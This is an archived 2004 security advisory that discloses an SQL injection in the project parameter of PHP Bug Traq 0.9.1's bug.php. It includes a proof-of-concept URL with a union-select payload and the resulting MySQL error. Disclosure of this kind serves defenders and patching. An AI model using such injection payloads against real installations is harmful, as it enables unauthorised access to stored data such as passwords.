SQL Injection in phpBT (bug.php) add project

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 




 _   _                ______           _    
| | | |               |  _  \         | |   
| |_| | _____      __ | | | |__ _ _ __| | __
|  _  |/ _ \ \ /\ / / | | | / _` | '__| |/ /
| | | | (_) \ V  V /  | |/ / (_| | |  |   < 
\_| |_/\___/ \_/\_/   |___/ \__,_|_|  |_|\_\

http://www.howdark.com

----------------------------------------------------------------------------------------------------------------------------------
// Information
----------------------------------------------------------------------------------------------------------------------------------

Author:	How Dark
Date:	November 13, 2004
URL:	http://www.howdark.com

Affected Software:		PHP Bug Traq
Software Version:		0.9.1
Software URL:		http://phpbt.sourceforge.net/

Attack:			SQL Injection, allowing people to minipulate the query into pulling data
			they should not previously be able too obtain. (Such as passwords)


Description:		project variable is left open..

----------------------------------------------------------------------------------------------------------------------------------

xxx

----------------------------------------------------------------------------------------------------------------------------------
// Description
----------------------------------------------------------------------------------------------------------------------------------

When forms come up for you to add a bug, the project selection is open
to sql injection.

----------------------------------------------------------------------------------------------------------------------------------

xxx

----------------------------------------------------------------------------------------------------------------------------------
// URL
----------------------------------------------------------------------------------------------------------------------------------

bug.php?op=add&project=
bug.php?op=add&project=0%20union%20select%201

----------------------------------------------------------------------------------------------------------------------------------

xxx

----------------------------------------------------------------------------------------------------------------------------------
// SQL Error
----------------------------------------------------------------------------------------------------------------------------------

DB Error: syntax error
select project_name from project where project_id = \' [nativecode=1064 ** You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1]

----------------------------------------------------------------------------------------------------------------------------------

xxx

;eof

[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux